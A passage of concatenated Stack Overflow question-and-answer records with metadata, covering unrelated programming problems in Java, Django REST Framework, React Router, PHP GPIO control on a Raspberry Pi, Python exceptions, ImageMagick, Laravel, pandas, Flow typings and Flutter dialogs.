[self.connection accept:[NSDictionary dictionaryWithObject:[NSNumber numberWithBool:NO]
forKey:@"video-enabled"]];
}
}
but I'm getting this error: {
"NSLocalizedDescription" : "Failed to set remote offer sdp: Called with SDP without DTLS fingerprint."
}
How to solve this issue?
Please help me understand how to receive a call using the RestComm SDK.
A: Pankaj, the issue seems to be that the incoming call doesn't use webrtc for media (remember that Restcomm iOS SDK only supports webrtc for media). Can you verify that?
| Q: iOS App > Failed to set remote offer sdp: Called with SDP without DTLS fingerprint I'm using the RestComm SDK with freeSWITCH SDP in an iOS app,
and I'm trying to call from user A to user B.
The call connects successfully on both devices, and I answer the call using the function below:
- (IBAction)tappedOnAnswer:(id)sender {
if (self.connection != nil) {
[self.connection accept:[NSDictionary dictionaryWithObject:[NSNumber numberWithBool:NO]
forKey:@"video-enabled"]];
}
}
but I'm getting this error: {
"NSLocalizedDescription" : "Failed to set remote offer sdp: Called with SDP without DTLS fingerprint."
}
How to solve this issue?
Please help me understand how to receive a call using the RestComm SDK.
A: Pankaj, the issue seems to be that the incoming call doesn't use webrtc for media (remember that Restcomm iOS SDK only supports webrtc for media). Can you verify that?
| stackoverflow | {
"language": "en",
"length": 128,
"provenance": "stackexchange_0000F.jsonl.gz:901142",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655539"
} |
1fd1c1935ba692957dad708145134f4e4ba11a4e | Stackoverflow Stackexchange
Q: Determine if character has case in JAVA In Java (Android), I'm trying to determine, in a String, if each character has an equivalent in upper or lower case.
My goal is not to lower or upper the case, but to know if it's possible.
For example this function would return true for : 'e' 'é' 'i' 'l' 'L' 'O' 'P'
and false for emojis or chinese characters.
Is there any function that can do this?
EDIT: To be more clear, the function was supposed to take a character as its argument, not a String, and return false if the character had no uppercase or lowercase version.
A: You can try this:
boolean validate(char c){
return Character.isUpperCase(c) || Character.isLowerCase(c);
}
This will return true iff it is a letter in uppercase or lowercase. Otherwise it'll return false.
| Q: Determine if character has case in JAVA In Java (Android), I'm trying to determine, in a String, if each character has an equivalent in upper or lower case.
My goal is not to lower or upper the case, but to know if it's possible.
For example this function would return true for : 'e' 'é' 'i' 'l' 'L' 'O' 'P'
and false for emojis or chinese characters.
Is there any function that can do this?
EDIT: To be more clear, the function was supposed to take a character as its argument, not a String, and return false if the character had no uppercase or lowercase version.
A: You can try this:
boolean validate(char c){
return Character.isUpperCase(c) || Character.isLowerCase(c);
}
This will return true iff it is a letter in uppercase or lowercase. Otherwise it'll return false.
A: The requirements are still not entirely specified (do you care whether the upper/lowercase equivalent is a different character from the original?), but my most straightforward interpretation of the question is:
For each character ch in a given string, is it true that either toUpperCase(ch) yields an uppercase character, or that toLowerCase(ch) yields a lowercase character?
I phrase it that way because Character.toUpperCase() returns "the uppercase equivalent of the character, if any; otherwise, the character itself".
The doc for String.toUppercase() doesn't mention what happens if there is no uppercase equivalent for some characters, but I think we can assume it returns those characters unchanged, as does Character.toUpperCase().
So a straightforward implementation of that condition would be to test
Character.isUpperCase(s.toUpperCase().charAt(0)) ||
Character.isLowerCase(s.toLowerCase().charAt(0));
for each character as a String.
I'm using the String rather than Character case conversion functions here, in order to take advantage of locale-sensitive mapping. Not only that, but regardless of locale, there are characters that cannot be converted to uppercase by Character.toUpperCase() because their uppercase equivalent is more than one character! For example, we would get incorrect results for \u00df 'ß' (see docs for details).
public class TestUpper {
public static void main(String[] args) {
final String test = "\u0633\u0644\u0627\u0645 World \u00df\u01c8eéilLOP\u76f4!";
for (Character ch : test.toCharArray()) {
System.out.format("'%c' (U+%04x): hasCase()=%b%n", ch, (int)ch, hasCase(ch));
}
}
static boolean hasCase(Character ch) {
String s = ch.toString();
// Does the character s have an uppercase or a lowercase equivalent?
return Character.isUpperCase(s.toUpperCase().charAt(0)) ||
Character.isLowerCase(s.toLowerCase().charAt(0));
}
}
And the results:
'س' (U+0633): hasCase()=false
'ل' (U+0644): hasCase()=false
'ا' (U+0627): hasCase()=false
'م' (U+0645): hasCase()=false
' ' (U+0020): hasCase()=false
'W' (U+0057): hasCase()=true
'o' (U+006f): hasCase()=true
'r' (U+0072): hasCase()=true
'l' (U+006c): hasCase()=true
'd' (U+0064): hasCase()=true
' ' (U+0020): hasCase()=false
'ß' (U+00df): hasCase()=true
'Lj' (U+01c8): hasCase()=true
'e' (U+0065): hasCase()=true
'é' (U+00e9): hasCase()=true
'i' (U+0069): hasCase()=true
'l' (U+006c): hasCase()=true
'L' (U+004c): hasCase()=true
'O' (U+004f): hasCase()=true
'P' (U+0050): hasCase()=true
'直' (U+76f4): hasCase()=false
'!' (U+0021): hasCase()=false
These test cases include Arabic letters and a Chinese character (which are isLetter(), but have no upper/lowercase equivalents), the requested test letters, space and punctuation, and a titlecase letter.
The results are correct according to the criteria currently stated in the question. However, the OP has said in comments that he wants the function to return false for titlecase characters, such as U+01c8, whereas the above code returns true because they have uppercase and lowercase equivalents (U+01c7 and U+01c9). But the OP's statement seems to be based on the mistaken impression that titlecase letters do not have uppercase and lowercase equivalents. Ongoing discussion has not yet resolved the confusion.
Disclaimer: This answer doesn't attempt to take into account supplementary or surrogate code points.
A: For a simple method, there's Character.isLowerCase. But you actually need to be careful: it depends on the language. Some languages may have a lowercase 'é' but no uppercase. Or, like the Turkish "I", a character may have a different lowercase version than in other languages.
To work around that, I'd use something like Character.isLetter(myChar) && String.valueOf(myChar).toLowerCase().equals(String.valueOf(myChar)). Remember to use the version of toLowerCase that takes a Locale as parameter if not comparing in the default Locale.
A: Check if the character is either a lowercase letter or an uppercase letter:
Character.isLowerCase(ch) != Character.isUpperCase(ch)
Alternatively, you can compare the lower and uppercased forms of the character:
Character.toLowerCase(ch) == Character.toUpperCase(ch)
However, you need to be careful about locale (there is one letter in Turkish where I think the lower and uppercase forms are the same).
A: public boolean validate(char value){
if( (value >= 'a' && value <= 'z') || (value >= 'A' && value <= 'Z') )
return true;
return false;
}
Apply this to each character of your String:
public boolean All( String cad ){
for( int i = 0; i < cad.length() ; i++ ){
if( !validate(cad.charAt(i)) ){
// the letter has no uppercase or lowercase form
return false;
}
}
return true;
}
A: Comparing the uppercased and lowercased versions of the whole string is not enough to tell whether every character has case: "true1" will not equal "TRUE1", yet the '1' should fail the test. You need to check each individual character. This is a rough cut; you'll probably have to do something fancy for emojis and Chinese characters.
public static boolean isAllCase(String value) {
String upper = value.toUpperCase();
String lower = value.toLowerCase();
if(upper.length() != lower.length())
return false;
for(int i = 0; i < upper.length(); i++) {
if(upper.charAt(i) == lower.charAt(i))
return false;
}
return true;
}
A: public boolean hasEquivalentCase(char ch) {
return Character.isLowerCase(ch) || Character.isUpperCase(ch);
}
| stackoverflow | {
"language": "en",
"length": 875,
"provenance": "stackexchange_0000F.jsonl.gz:901147",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655554"
} |
b26c41b8e8de597b891ff29acef4242737f1cf42 | Stackoverflow Stackexchange
Q: Override response of POST in Django Rest Framework I'm using Django Rest Framework's generics (generics.ListCreateAPIView). When I make a POST request I get a response with an HTTP status code (200/400/etc.) and a JSON body showing the posted data. I need to know how I can override the response to return a custom response.
Note that I use
def perform_create(self,serializer):
return Response(<my response>)
to override the POST request handling but I still get the same response
A: The response from perform_create is ignored.
You'll likely want to override the create method, using the mixins as an example.
| Q: Override response of POST in Django Rest Framework I'm using Django Rest Framework's generics (generics.ListCreateAPIView). When I make a POST request I get a response with an HTTP status code (200/400/etc.) and a JSON body showing the posted data. I need to know how I can override the response to return a custom response.
Note that I use
def perform_create(self,serializer):
return Response(<my response>)
to override the POST request handling but I still get the same response
A: The response from perform_create is ignored.
You'll likely want to override the create method, using the mixins as an example.
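A minimal sketch of such an override, modelled on CreateModelMixin.create (the view name and response payload are assumptions):
from rest_framework import generics, status
from rest_framework.response import Response
class MyListCreateAPIView(generics.ListCreateAPIView):
    # queryset and serializer_class configured as usual
    def create(self, request, *args, **kwargs):
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        self.perform_create(serializer)
        # return a custom payload instead of the default serialized object
        return Response({"message": "created"}, status=status.HTTP_201_CREATED)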
| stackoverflow | {
"language": "en",
"length": 94,
"provenance": "stackexchange_0000F.jsonl.gz:901171",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655624"
} |
9e9976229fb95777bc4718f3b47b44374e604a06 | Stackoverflow Stackexchange
Q: What is ACTUALLY the right way to transition/redirect using React Router? I'm in the process of learning React Router, and I can't seem to figure out what is currently the recommended way to redirect. I've read many articles and StackOverflow posts, but there is so much variety that I'm unsure of which one to implement for the current version of React Router.
What I'm trying to do is to redirect after an AJAX call using axios.
axios.post('/some-route')
.then(/*I want to redirect here*/)
Note: this code lives inside a function, inside a React.Component, that is called upon the submission of a form.
How do I accomplish this?
Please kindly let me know what details you need.
A: You can use browserHistory :
import { browserHistory } from "react-router";
browserHistory.push({
pathname: '/your/path'
});
| Q: What is ACTUALLY the right way to transition/redirect using React Router? I'm in the process of learning React Router, and I can't seem to figure out what is currently the recommended way to redirect. I've read many articles and StackOverflow posts, but there is so much variety that I'm unsure of which one to implement for the current version of React Router.
What I'm trying to do is to redirect after an AJAX call using axios.
axios.post('/some-route')
.then(/*I want to redirect here*/)
Note: this code lives inside a function, inside a React.Component, that is called upon the submission of a form.
How do I accomplish this?
Please kindly let me know what details you need.
A: You can use browserHistory :
import { browserHistory } from "react-router";
browserHistory.push({
pathname: '/your/path'
});
A:
This answer is for react-router-v4.
If you want to redirect from the same component (not from some action) and this component is rendered by some route then you can use history object passed in the props.
componentDidMount(){
if(this.state.some_param){
this.props.history.push("/some_location")
}
}
The best way is to create your own history object. You can use this history object in any action.
//history.js
import createHistory from 'history/createBrowserHistory'
export default createHistory()
then you can use this history in your router,
import history from "./history"
<Router history = {history}>
//other code
</Router>
now you can use this history object anywhere for redirect,
axios.post('/some-route')
.then(res=>{
history.push("/some_location")
})
const {Component} = React
const {render} = ReactDOM
const {Router, Link, Route, Switch, withRouter, Redirect} = ReactRouterDOM
const createHistory = History.createHashHistory
const myhistory = createHistory()
class App extends Component{
redirectToHome(){
myhistory.push("/home")
}
redirectToAbout(){
myhistory.push("/about")
}
render(){
return(
<div>
<Route path = "/home" component = {Home} />
<Route path = "/about" component = {About} />
<button onClick = {this.redirectToHome}>Redirect to home</button>
<button onClick = {this.redirectToAbout}>Redirect to about</button>
</div>
)
}
}
const Home = ()=>{
return(
<div>
Home
</div>
)
}
const About = ()=>{
return(
<div>About</div>
)
}
render(<Router history = {myhistory}><App/></Router>, document.getElementById('app'))
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react-dom.js"></script>
<script src="https://unpkg.com/[email protected]/umd/react-router-dom.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/history/4.6.3/history.min.js"></script>
<div id="app"></div>
A: Starting from React Router v4, browserHistory is no longer exported from react-router.
You have two possibilities.
1) If your component is rendered via a route (i.e. it is the component prop of a <Route> component), then you automatically get a few objects as props:
*
*history
*match
*location
You can then use this.props.history.push("/some_location") in the context of the component
2) If your component is not related to a specific route, you can get the same props by using the withRouter high order component, which is part of react-router
import { withRouter } from "react-router-dom";
const Component = ( { history, location, match } ) => (
// your component code
);
export default withRouter(Component);
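Tying this back to the original axios call, inside a component that received the history prop (via a Route or withRouter), the redirect could look like this sketch (the target path is an assumption):
axios.post('/some-route')
  .then(() => {
    this.props.history.push('/success');
  });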
| stackoverflow | {
"language": "en",
"length": 450,
"provenance": "stackexchange_0000F.jsonl.gz:901183",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655661"
} |
ca6f0b0bb31d371a5f9e928411f640def8ba5c0a | Stackoverflow Stackexchange
Q: Python - Control Led using php I would like to control my LED lighting through a webpage. I followed a YouTube tutorial; it works perfectly for pinon.php and pinoff.php.
However, it does not work for control.php; does anybody know the reason?
pinon.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 1");
?>
pinoff.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 0");
?>
control.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$('#clickON').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinon.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
$('#clickOFF').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinoff.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
});
</script>
<title>Pi controller</title>
</head>
<body>
<button type="button" id="clickON">ON</button><br>
<button type="button" id="clickOFF">OFF</button><br>
</body>
</html>
Link for the tutorial :Making Raspberry Pi Web Controls
| Q: Python - Control Led using php I would like to control my LED lighting through a webpage. I followed a YouTube tutorial; it works perfectly for pinon.php and pinoff.php.
However, it does not work for control.php; does anybody know the reason?
pinon.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 1");
?>
pinoff.php
<?php
system("gpio -g mode 18 out");
system("gpio -g write 18 0");
?>
control.php
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$('#clickON').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinon.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
$('#clickOFF').click(function(){
var a = new XMLHttpRequest();
a.open("GET","pinoff.php");
a.onreadystatechange=function(){
if(a.readyState==4){
if(a.status == 200){
}
else alert("HTTP ERROR");
}
}
a.send();
});
});
</script>
<title>Pi controller</title>
</head>
<body>
<button type="button" id="clickON">ON</button><br>
<button type="button" id="clickOFF">OFF</button><br>
</body>
</html>
Link for the tutorial :Making Raspberry Pi Web Controls
| stackoverflow | {
"language": "en",
"length": 141,
"provenance": "stackexchange_0000F.jsonl.gz:901210",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655734"
} |
c47935ddc737ffcb3760eab178690b9ede7a5c10 | Stackoverflow Stackexchange
Q: twitter stream api filter_level I can't find any reference about the twitter stream api filter_level when I want to follow some accounts using user stream.
I know none means no filter, but I keep getting retweets from other people when I set filter_level to low; when I set filter_level to medium, I can't get anything from it. Could anybody tell me what each filter_level means?
A: Twitter measures the importance of a tweet using this parameter. It is a rating that Twitter gives to its tweets. A tweet with filter_level=high is identified as more important (a part of the @toptweets concept).
If you set filter_level=low, then you are asking for tweets with low, medium and high filter levels. You set the minimum quality of the tweets that you want using filter_level.
This is a useful resource: https://thenextweb.com/twitter/2013/02/14/twitter-adds-language-info-ability-to-filter-tweets-by-importance-with-new-metadata/
| Q: twitter stream api filter_level I can't find any reference about the twitter stream api filter_level when I want to follow some accounts using user stream.
I know none means no filter, but I keep getting retweets from other people when I set filter_level to low; when I set filter_level to medium, I can't get anything from it. Could anybody tell me what each filter_level means?
A: Twitter measures the importance of a tweet using this parameter. It is a rating that Twitter gives to its tweets. A tweet with filter_level=high is identified as more important (a part of the @toptweets concept).
If you set filter_level=low, then you are asking for tweets with low, medium and high filter levels. You set the minimum quality of the tweets that you want using filter_level.
This is a useful resource: https://thenextweb.com/twitter/2013/02/14/twitter-adds-language-info-ability-to-filter-tweets-by-importance-with-new-metadata/
| stackoverflow | {
"language": "en",
"length": 140,
"provenance": "stackexchange_0000F.jsonl.gz:901236",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655818"
} |
b69c5d2477bd9700ef41c2794a5a50e097791150 | Stackoverflow Stackexchange
Q: What is the difference between except and except BaseException What is the difference between those two:
except:
# do something
and
except BaseException as be:
print(be)
I mean in the first case all possible exceptions are caught, but is this true for the second?
Also can the error message be printed using the first case?
A: The accepted answer is incomplete (at least for Python 3.6 and above).
By catching Exception you catch most errors - basically all the errors that any module you use might throw.
By catching BaseException, in addition to all the above exceptions, you also catch exceptions of the types SystemExit, KeyboardInterrupt, and GeneratorExit.
By catching KeyboardInterrupt, for example, you may stop your code from exiting after an initiated exit by the user (like pressing ^C in the console, or stopping launched application on some interpreters). This could be a wanted behavior (for example - to log an exit), but should be used with extreme care!
In the above example, by catching BaseException, you may cause your application to hang when you want it to exit.
| Q: What is the difference between except and except BaseException What is the difference between those two:
except:
# do something
and
except BaseException as be:
print(be)
I mean in the first case all possible exceptions are caught, but is this true for the second?
Also can the error message be printed using the first case?
A: The accepted answer is incomplete (at least for Python 3.6 and above).
By catching Exception you catch most errors - basically all the errors that any module you use might throw.
By catching BaseException, in addition to all the above exceptions, you also catch exceptions of the types SystemExit, KeyboardInterrupt, and GeneratorExit.
By catching KeyboardInterrupt, for example, you may stop your code from exiting after an initiated exit by the user (like pressing ^C in the console, or stopping launched application on some interpreters). This could be a wanted behavior (for example - to log an exit), but should be used with extreme care!
In the above example, by catching BaseException, you may cause your application to hang when you want it to exit.
A: Practically speaking, there is no difference between except: and except BaseException:, for any current Python release.
That's because you can't just raise any type of object as an exception. The raise statement explicitly disallows raising anything else:
[...] raise evaluates the first expression as the exception object. It must be either a subclass or an instance of BaseException.
Bold emphasis mine. This has not always been the case however, in older Python releases (2.4 and before) you could use strings as exceptions too.
The advantage then is that you get to have easy access to the caught exception. In order to be able to add as targetname, you must catch a specific class of exceptions, and only BaseException is going to do that.
You can still access the currently active exception by using sys.exc_info() though:
except:
be = sys.exc_info()[1]  # note: requires import sys
Pick what you feel is more readable for your future self and for your colleagues.
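A minimal sketch illustrating the hierarchy difference discussed above (Exception does not catch KeyboardInterrupt, while BaseException and a bare except do):
try:
    raise KeyboardInterrupt
except Exception:
    print("caught by Exception")  # never reached: KeyboardInterrupt is not an Exception
except BaseException as be:
    print("caught by BaseException:", type(be).__name__)  # prints KeyboardInterrupt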
| stackoverflow | {
"language": "en",
"length": 337,
"provenance": "stackexchange_0000F.jsonl.gz:901249",
"question_score": "29",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655854"
} |
cefde8b66859f0077126027d35dfef326a46debc | Stackoverflow Stackexchange
Q: Autotrim white border from scanned image with ImageMagick? I have ~200 scanned photos which I want to crop the white space out of. See example:
Can someone provide me with the appropriate command line code to do this?... I have been trying to sort out the -trim and -fuzz options with no luck. NOT ALL images are the same size (i.e. 4x6, 5x7, etc). All images were scanned/saved as jpg.
Ideal scenario is a script where new trimmed photos are saved in one subdirectory.
Thanks in advance!
A: I would suggest using -morphology to remove the scan artifacts, trim, and then capture the resulting paging.
PAGE_OFFSET=$(convert TrmkF.jpg -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%wx%h%O' info:-)
The $PAGE_OFFSET variable should now have the rough location of the scanned photo. We can apply that value with the -crop command.
convert TrmkF.jpg -crop $PAGE_OFFSET output.jpg
(output image: https://i.stack.imgur.com/u8bSs.png)
Edit
A (powershell) batch script may look as simple as...
Get-ChildItem "C:\path\to\photos" -Filter *.jpg |
Foreach-Object {
$pageOffset = magick $_.FullName -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%wx%h%O' info:- | Out-String
$output = $_.FullName + ".output.jpg"
magick $_.FullName -crop $pageOffset +repage $output
}
ymmv
| Q: Autotrim white border from scanned image with ImageMagick? I have ~200 scanned photos which I want to crop the white space out of. See example:
Can someone provide me with the appropriate command line code to do this?... I have been trying to sort out the -trim and -fuzz options with no luck. NOT ALL images are the same size (i.e. 4x6, 5x7, etc). All images were scanned/saved as jpg.
Ideal scenario is a script where new trimmed photos are saved in one subdirectory.
Thanks in advance!
A: I would suggest using -morphology to remove the scan artifacts, trim, and then capture the resulting paging.
PAGE_OFFSET=$(convert TrmkF.jpg -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%wx%h%O' info:-)
The $PAGE_OFFSET variable should now have the rough location of the scanned photo. We can apply that value with the -crop command.
convert TrmkF.jpg -crop $PAGE_OFFSET output.jpg
(output image: https://i.stack.imgur.com/u8bSs.png)
Edit
A (powershell) batch script may look as simple as...
Get-ChildItem "C:\path\to\photos" -Filter *.jpg |
Foreach-Object {
$pageOffset = magick $_.FullName -morphology Dilate:3 Diamond:3,5 -fuzz 10% -trim -format '%wx%h%O' info:- | Out-String
$output = $_.FullName + ".output.jpg"
magick $_.FullName -crop $pageOffset +repage $output
}
ymmv
A: I've found that the above gives bad results (I think the formatting is different on macOS or something), so I'm sharing my success story here.
I just modified parameters from the other individual's answer and got amazing results using this:
*
*cd into your folder of images
*mkdir ../done
*for f in *.jpg; do \
echo "$f";\
size=$(magick "$f" -bordercolor White -border 10x10 \
-morphology Dilate:5 Diamond:5,7 -fuzz 5% -trim \
-format "%wx%h%O" info:-); \
echo $size; \
magick "$f" -bordercolor White -border 10x10 -crop $size +repage "../done/$f"; done;
| stackoverflow | {
"language": "en",
"length": 297,
"provenance": "stackexchange_0000F.jsonl.gz:901284",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655961"
} |
e91e5fc4b9c4713cc5f3eb6f72a8333a808f7223 | Stackoverflow Stackexchange
Q: Laravel return model relationships in JSON When I try to return model relationships in JSON, I don't see the relationship fields. That's my query:
$customer_subscriptions = CustomerSubscription::has("customer")
->has("subscription")
->has("federationDiscipline")
->where("customer_id", "=", $customer_id)
->whereHas("subscription", function($query) use($company_id) {
$query->where("company_id", "=", $company_id);
})
->orderBy("start_date", "asc");
return $customer_subscriptions;
That's my result:
[0]=>
array(14) {
["id"]=>
int(2)
["customer_id"]=>
int(1)
["subscription_id"]=>
int(1)
["federation_discipline_id"]=>
int(1)
["start_date"]=>
string(10) "2017-04-01"
["end_date"]=>
string(10) "2017-05-31"
["external_id"]=>
NULL
["notes"]=>
NULL
["created_user_id"]=>
int(1)
["updated_user_id"]=>
NULL
["deleted_user_id"]=>
NULL
["created_at"]=>
string(19) "2017-06-05 07:28:00"
["updated_at"]=>
string(19) "2017-06-05 07:28:00"
["deleted_at"]=>
NULL
}
I don't see the subscription's and the customer's relationship field. The result of query should return JSON to AJAX
A: Using ->has only acts as a where condition, it doesn't load that relation in to your result set.
You want to use ->with instead.
In your case ->with('subscription','federationDiscipline')
https://laravel.com/docs/5.4/eloquent-relationships#eager-loading
| Q: Laravel return model relationships in JSON When I try to return model relationships in JSON, I don't see the relationship fields. That's my query:
$customer_subscriptions = CustomerSubscription::has("customer")
->has("subscription")
->has("federationDiscipline")
->where("customer_id", "=", $customer_id)
->whereHas("subscription", function($query) use($company_id) {
$query->where("company_id", "=", $company_id);
})
->orderBy("start_date", "asc");
return $customer_subscriptions;
That's my result:
[0]=>
array(14) {
["id"]=>
int(2)
["customer_id"]=>
int(1)
["subscription_id"]=>
int(1)
["federation_discipline_id"]=>
int(1)
["start_date"]=>
string(10) "2017-04-01"
["end_date"]=>
string(10) "2017-05-31"
["external_id"]=>
NULL
["notes"]=>
NULL
["created_user_id"]=>
int(1)
["updated_user_id"]=>
NULL
["deleted_user_id"]=>
NULL
["created_at"]=>
string(19) "2017-06-05 07:28:00"
["updated_at"]=>
string(19) "2017-06-05 07:28:00"
["deleted_at"]=>
NULL
}
I don't see the subscription's and the customer's relationship field. The result of query should return JSON to AJAX
A: Using ->has only acts as a where condition, it doesn't load that relation in to your result set.
You want to use ->with instead.
In your case ->with('subscription','federationDiscipline')
https://laravel.com/docs/5.4/eloquent-relationships#eager-loading
A: You have to eager load the relationships for them to be included in the json output. You current query only looks if there are relations, it doesn't load them.
For example:
$customer_subscriptions = CustomerSubscription::has("customer")
->has("subscription")
->has("federationDiscipline")
->where("customer_id", "=", $customer_id)
->whereHas("subscription", function($query) use($company_id) {
$query->where("company_id", "=", $company_id);
})
->orderBy("start_date", "asc")
->with('customer'); // <--- Eager loading the customer
return $customer_subscriptions;
return $customer_subscriptions;
A: Use the with() method to include relationships in results. For example:
$customer_subscriptions = CustomerSubscription::with("customer")->...
Alternatively, use the protected $appends = [...] attribute on models to force the relationship to be loaded for every query. Keep in mind, however, this will impact queries everywhere the model is used, as it forces the database to query for those relationships every time.
| stackoverflow | {
"language": "en",
"length": 256,
"provenance": "stackexchange_0000F.jsonl.gz:901287",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655969"
} |
336f6432f49cee03f272c6e05caa1c3a1ce18474 | Stackoverflow Stackexchange
Q: How to write DataFrame-friendly functions Recently I've been making the switch from using numpy's ndarray to pandas' DataFrame for my data analysis needs. I've noticed that numpy functions seem to accept DataFrame objects in place of ndarray without issue. However, when I try to use many of my existing functions written to operate on ndarray, they often fail on indexing operations, broadcasting etc. and I am forced to pass the underlying ndarray with df.values.
Is there some standard way or set of guidelines to make a function compatible with DataFrame? How do numpy functions accomodate for both types?
A: I resorted to digging around in the numpy source code and found that many functions simply convert the input to ndarray first using functions such as asarray or asanyarray.
def numpyFunction(x, *args, **kwargs):
x = np.asanyarray(x)
...
| Q: How to write DataFrame-friendly functions Recently I've been making the switch from using numpy's ndarray to pandas' DataFrame for my data analysis needs. I've noticed that numpy functions seem to accept DataFrame objects in place of ndarray without issue. However, when I try to use many of my existing functions written to operate on ndarray, they often fail on indexing operations, broadcasting etc. and I am forced to pass the underlying ndarray with df.values.
Is there some standard way or set of guidelines to make a function compatible with DataFrame? How do numpy functions accomodate for both types?
A: I resorted to digging around in the numpy source code and found that many functions simply convert the input to ndarray first using functions such as asarray or asanyarray.
def numpyFunction(x, *args, **kwargs):
x = np.asanyarray(x)
...
| stackoverflow | {
"language": "en",
"length": 137,
"provenance": "stackexchange_0000F.jsonl.gz:901295",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656007"
} |
d81cab36498ec528330abae65caa8e437b6f6aab | Stackoverflow Stackexchange
Q: How do I generate .d.ts typings from Flow code? I have enabled Flow on a JavaScript project I am developing. Since I am putting in the effort to providing type annotations, I would really like to generate *.d.ts files so the broader TypeScript community can also have type information.
How can I generate *.d.ts type definition files from Flow-annotated JavaScript?
A: I searched for the available tools. I found the following.
The first one is the most up to date one. It can convert the whole Flow code to TypeScript. I have used it personally, and it works like a charm.
https://github.com/Khan/flow-to-ts
Other ones:
https://github.com/Kiikurage/babel-plugin-flow-to-typescript
https://github.com/burnnat/flow-to-dts
https://github.com/bcherny/flow-to-typescript
https://github.com/yuya-takeyama/flow2dts
| stackoverflow | {
"language": "en",
"length": 109,
"provenance": "stackexchange_0000F.jsonl.gz:901297",
"question_score": "18",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656011"
} |
0fd0597376fb520025f8398a13470eeeeb965173 | Stackoverflow Stackexchange
Q: Flutter - SimpleDialog in FloatingActionButton I'm trying to create a SimpleDialog after a tap on the FloatingActionButton; however, when pressing that button nothing happens.
What am I doing wrong?
import "package:flutter/material.dart";
void main() {
runApp(new ControlleApp());
}
class ControlleApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return new MaterialApp(
home: new HomePage(),
);
}
}
class HomePage extends StatelessWidget {
@override
Widget build(BuildContext context) => new Scaffold(
appBar: new AppBar(
backgroundColor: new Color(0xFF26C6DA),
),
floatingActionButton: new FloatingActionButton(
tooltip: 'Add',
child: new Icon(Icons.add),
backgroundColor: new Color(0xFFF44336),
onPressed: (){
new SimpleDialog(
title: new Text('Test'),
children: <Widget>[
new RadioListTile(
title: new Text('Testing'), value: null, groupValue: null, onChanged: (value) {},
)
],
);
}
),
);
}
A: I noticed the accepted answer is using child for showDialog which is actually deprecated, so I would recommend avoiding it. You should be using builder instead, I've provided an example:
onPressed: () {
showDialog(
context: context,
builder: (_) => AlertDialog(
title: Text('Dialog Title'),
content: Text('This is my content'),
)
);
}
A: You need to wrap this in a showDialog call.
showDialog(context: context, builder: (BuildContext context) {
  return new AlertDialog(
    title: new Text("My Super title"),
    content: new Text("Hello World"),
  );
});
A: There is a specific scenario that should be taken care of while showing the dialog from a FloatingActionButton.
if you write your code like this
class MyApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return MaterialApp(
home: Scaffold(
floatingActionButton: FloatingActionButton(
onPressed: () {
showDialog(
context: context,
builder: (ctxt) => new AlertDialog(
title: Text("Text Dialog"),
)
);
}),
)
);
}
}
It will not show the AlertDialog but instead throws the exception "No MaterialLocalizations found."
This happens because the context passed to showDialog belongs to a widget above the MaterialApp, so no MaterialLocalizations ancestor can be found. However, if we change the code as follows
class MyApp extends StatelessWidget {
@override
Widget build(BuildContext context) {
return MaterialApp(
home: MyAppImpl()
);
}
}
class MyAppImpl extends StatelessWidget {
@override
Widget build(BuildContext context) {
return Scaffold(
floatingActionButton: FloatingActionButton(
onPressed: () {
showDialog(
context: context,
builder: (ctxt) => new AlertDialog(
title: Text("Text Dialog"),
)
);
}),
);
}
}
The MaterialApp is now an ancestor of the context used for the dialog and everything works fine. In this case Flutter automatically provides the MaterialLocalizations, which otherwise would need to be created manually.
I didn't find any documentation for this in the official docs.
Hope it helps
| stackoverflow | {
"language": "en",
"length": 392,
"provenance": "stackexchange_0000F.jsonl.gz:901298",
"question_score": "46",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
